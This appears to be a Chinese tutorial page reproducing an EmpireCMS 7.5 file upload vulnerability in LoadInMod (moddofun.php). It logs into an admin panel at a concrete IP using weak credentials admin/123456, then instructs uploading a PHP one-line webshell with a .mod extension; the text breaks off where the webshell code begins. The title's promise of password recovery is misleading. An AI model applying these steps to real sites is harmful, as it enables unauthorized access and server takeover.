zl程序教程

您现在的位置是:首页 >  其他

当前栏目

帝国cms弱口令登录(帝国cms后台密码忘记怎么办?)

密码后台密码 登录 怎么办 忘记 cms 口令
2023-09-11 14:19:27 时间

利用帝国cms弱口令登录过程:

1、利用帝国cms弱口令登录漏洞描述

EmpireCMS(帝国网站管理系统)是一套内容管理系统(CMS)。 EmpireCMS 7.5版本中的e/class/moddofun.php文件的‘LoadInMod’函数存在安全漏洞。攻击者可利用该漏洞上传任意文件。

2、利用帝国cms弱口令登录影响范围

EmpireCMS<=7.5版本都影响

3、帝国cms弱口令漏洞复现

进入帝国cms后台

http://123.58.224.8:14326/empirecms/e/admin/

弱口令admin/123456登陆成功,然后点击

上传一句话木马,后缀名为.mod,这个很关键了

<?php file_put_conte